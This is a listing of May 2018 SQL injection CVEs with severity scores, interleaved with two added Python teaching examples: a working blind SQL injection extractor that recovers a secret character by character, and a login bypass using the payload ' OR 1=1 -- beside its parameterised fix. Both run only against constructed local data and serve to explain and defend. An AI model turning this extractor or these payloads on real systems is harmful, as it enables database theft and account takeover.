Security Vulnerabilities, CVEs, Published In May 2018 (SQL injection)
An issue was discovered in SITEMAKIN SLAC (Site Login and Access Control) v1.0. The parameter "my_item_search" in users.php is exploitable using SQL injection.
Max CVSS 9.8 | EPSS Score 0.46% | Published 2018-05-29 | Updated 2018-06-29
WUZHI CMS 4.1.0 has SQL Injection via an api/sms_check.php?param= URI.
Max CVSS 9.8 | EPSS Score 0.21% | Published 2018-05-29 | Updated 2018-06-28
The wpForo plugin through 2018-02-05 for WordPress has SQL Injection via a search with the /forum/ wpfo parameter.
Max CVSS 9.8 | EPSS Score 0.35% | Published 2018-05-28 | Updated 2018-06-28
iScripts eSwap v2.4 has SQL injection via the "search.php" 'Told' parameter in the User Panel.
Max CVSS 8.8 | EPSS Score 0.07% | Published 2018-05-25 | Updated 2018-06-27
A SQL Injection issue was observed in the parameter "q" in jobcard-ongoing.php in EasyService Billing 1.0.
Max CVSS 9.8 | EPSS Score 0.76% | Published 2018-05-25 | Updated 2018-06-27
An issue was discovered in BearAdmin 0.5. There is admin/admin_log/index.html?user_id= SQL injection because admin\controller\AdminLog.php constructs a MySQL query improperly.
Max CVSS 8.8 | EPSS Score 0.09% | Published 2018-05-24 | Updated 2018-06-25
iScripts eSwap v2.4 has SQL injection via the "salelistdetailed.php" User Panel ToId parameter.
Max CVSS 9.8 | EPSS Score 0.15% | Published 2018-05-22 | Updated 2018-06-25
iScripts eSwap v2.4 has SQL injection via the wishlistdetailed.php User Panel ToId parameter.
Max CVSS 9.8 | EPSS Score 0.15% | Published 2018-05-22 | Updated 2018-06-25
An issue was discovered in PbootCMS v1.0.9. A SQL injection via the \apps\home\controller\ParserController.php scode parameter allows sensitive information to be read from the database.
Max CVSS 9.8 | EPSS Score 0.15% | Published 2018-05-22 | Updated 2018-06-22
Blind SQL injection in coupon_code in the MemberMouse plugin 2.2.8 and prior for WordPress allows an unauthenticated attacker to dump the WordPress MySQL database via an applyCoupon action in an admin-ajax.php request.
Max CVSS 9.8 | EPSS Score 0.20% | Published 2018-05-28 | Updated 2018-06-28
The Divido plugin for OpenCart has SQL injection, which attackers can use to disclose confidential information.
Max CVSS 8.1 | EPSS Score 0.90% | Published 2018-05-23 | Updated 2018-06-26
The 'reportID' parameter received by the '/common/run_report.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type).
Max CVSS 9.8 | EPSS Score 0.22% | Published 2018-05-31 | Updated 2018-07-02
The 'orgID' parameter received by the '/common/download_agent_installer.php' script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, a blind time-based type).
Max CVSS 9.8 | EPSS Score 0.22% | Published 2018-05-31 | Updated 2018-06-29
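Why a "blind" injection such as the MemberMouse and KACE entries above still rates a full database dump: the application never echoes query results, but a yes/no answer (a row returned or not, or in the time-based variant a delay or not) is enough to recover any value a few bits per request. The block below is an added example, not code from any product on this page. The endpoint, the table schema and the secret value are constructed for illustration, and it uses SQLite's length(), substr() and unicode() functions as the inference primitives; a time-based variant would swap the row/no-row check for a delay (MySQL SLEEP() or BENCHMARK()) and keep the same search loop.

```python
"""Boolean-based blind SQL injection: recovering a value one character at a time
through a yes/no oracle. Added example; schema, secret and endpoint are constructed."""
import sqlite3
from typing import Callable, Tuple


def build_db() -> sqlite3.Connection:
    """In-memory database with a constructed lookup table and a constructed secret."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO reports VALUES (1, 'asset inventory')")
    conn.execute("CREATE TABLE secrets (value TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('s3cr3t')")  # constructed target value
    conn.commit()
    return conn


def vulnerable_report_exists(conn: sqlite3.Connection, report_id: str) -> bool:
    """Constructed endpoint: an unquoted numeric parameter pasted into the WHERE clause.
    The caller learns only whether a row came back, which is the blind oracle."""
    sql = "SELECT 1 FROM reports WHERE id = " + report_id
    return conn.execute(sql).fetchone() is not None


def _bisect_int(is_greater: Callable[[int], bool], lo: int, hi: int) -> int:
    """Find v in [lo, hi] with an oracle answering 'v > n?'; about log2(hi - lo) queries."""
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle: Callable[[str], bool], subquery: str,
                  max_len: int = 64) -> Tuple[str, int]:
    """Recover the scalar result of `subquery` through `oracle`.
    Returns (recovered_value, number_of_requests_used)."""
    count = 0

    def ask(condition: str) -> bool:
        nonlocal count
        count += 1
        # '1' keeps the original WHERE clause true; the AND carries our question.
        return oracle("1 AND (" + condition + ")")

    length = _bisect_int(lambda n: ask(f"length(({subquery})) > {n}"), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        # substr() is 1-based; unicode() returns the code point, so we binary-search 0..127.
        code = _bisect_int(
            lambda n: ask(f"unicode(substr(({subquery}), {pos}, 1)) > {n}"), 0, 127)
        chars.append(chr(code))
    return "".join(chars), count


if __name__ == "__main__":
    db = build_db()
    value, requests = blind_extract(
        lambda payload: vulnerable_report_exists(db, payload), "SELECT value FROM secrets")
    print(f"recovered {value!r} in {requests} requests")
```

At roughly seven requests per byte the whole table is reachable in minutes, which is why blind injection is scored no lower than the error-based kind. The fix is the same for both: bind the value as a parameter, and for a numeric identifier cast it to an integer before it reaches the query.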
PHPRAP 1.0.4 through 1.0.8 has SQL Injection via the application/home/controller/project.php search() function.
Max CVSS 9.8 | EPSS Score 0.15% | Published 2018-05-14 | Updated 2018-06-19
PHP remote file inclusion vulnerability in public/patch/patch.php in Project Pier 0.8.8 and earlier allows remote attackers to execute arbitrary commands or SQL statements via the id parameter.
Max CVSS 9.8 | EPSS Score 37.14% | Published 2018-05-16 | Updated 2020-05-06
CSP MySQL User Manager 2.3.1 allows SQL injection, and resultant Authentication Bypass, via a crafted username during a login attempt.
Max CVSS 9.8 | EPSS Score 0.34% | Published 2018-05-05 | Updated 2018-06-12
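The authentication-bypass pattern in the entry above (a crafted username that changes the meaning of the login query) in working form, as an added example that is not code from CSP MySQL User Manager or any other product on this page. It uses an in-memory SQLite table with a constructed user record; the vulnerable and hardened login functions, the table layout and the SHA-256 stand-in for password hashing are all assumptions for illustration.

```python
"""Login check built by string concatenation beside its parameterised form.
Added example; the schema, user record and hashing are constructed for illustration."""
import hashlib
import sqlite3


def _pw_hash(password: str) -> str:
    # Stand-in for illustration only; real code uses a slow password hash (argon2, bcrypt).
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """In-memory database with a single constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    conn.execute("INSERT INTO users (username, pw_hash) VALUES (?, ?)",
                 ("admin", _pw_hash("correct horse")))
    conn.commit()
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The username is spliced into the SQL text, so quotes and comment markers in it
    are parsed as SQL. A username such as  ' OR 1=1 --  removes the password check."""
    sql = ("SELECT id FROM users WHERE username = '" + username + "' "
           "AND pw_hash = '" + _pw_hash(password) + "'")
    return conn.execute(sql).fetchone() is not None


def hardened_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver sends the username as data, never as SQL text."""
    row = conn.execute("SELECT id FROM users WHERE username = ? AND pw_hash = ?",
                       (username, _pw_hash(password))).fetchone()
    return row is not None


if __name__ == "__main__":
    db = build_db()
    crafted = "' OR 1=1 -- "
    print("vulnerable, crafted username, wrong password:",
          vulnerable_login(db, crafted, "wrong"))
    print("hardened, crafted username, wrong password:",
          hardened_login(db, crafted, "wrong"))
```

The same crafted string, or a targeted form such as `admin' -- `, is treated as a literal username by the parameterised query and simply matches nothing. Input filtering of quotes is not a substitute: numeric and identifier contexts are not protected by quoting, and the bound-parameter form covers all of them.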
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/menuaccess.php chbKey1 parameter.
Max CVSS 7.2 | EPSS Score 1.86% | Published 2018-05-16 | Updated 2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/logbook.php txtSearch parameter.
Max CVSS 7.2 | EPSS Score 1.86% | Published 2018-05-16 | Updated 2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/info.php key1 parameter.
Max CVSS 7.2 | EPSS Score 1.86% | Published 2018-05-16 | Updated 2018-06-15
A SQL injection issue was discovered in Nagios XI before 5.4.13 via the admin/commandline.php cname parameter.
Max CVSS 7.2 | EPSS Score 1.86% | Published 2018-05-16 | Updated 2018-06-15
A vulnerability in ReadA version 1.1.0.2 and previous allows an authorized user with access to a privileged account on a BD Kiestra system (Kiestra TLA, Kiestra WCA, and InoqulA+ specimen processor) to issue SQL commands, which may result in loss or corruption of data.
Max CVSS 6.3 | EPSS Score 0.04% | Published 2018-05-24 | Updated 2019-10-09
A vulnerability in DB Manager version 3.0.1.0 and previous and PerformA version 3.0.0.0 and previous allows an authorized user with access to a privileged account on a BD Kiestra system (Kiestra TLA, Kiestra WCA, and InoqulA+ specimen processor) to issue SQL commands, which may result in data corruption.
Max CVSS 5.6 | EPSS Score 0.04% | Published 2018-05-24 | Updated 2019-10-09
Zoho ManageEngine ADAudit Plus before 5.0.0 build 5100 allows blind SQL Injection.
Max CVSS 9.8 | EPSS Score 0.35% | Published 2018-05-29 | Updated 2018-07-13
A SQL injection remote code execution vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow an attacker to execute arbitrary SQL statements on vulnerable installations due to a flaw in the formRequestDomains class. Authentication is required to exploit this vulnerability.
Max CVSS 9.0 | EPSS Score 0.67% | Published 2018-05-23 | Updated 2018-06-22
A SQL injection information disclosure vulnerability in Trend Micro Email Encryption Gateway 5.5 could allow a remote attacker to disclose sensitive information on vulnerable installations due to a flaw in the formChangePass class. Authentication is required to exploit this vulnerability.
Max CVSS 6.5 | EPSS Score 0.08% | Published 2018-05-23 | Updated 2018-06-22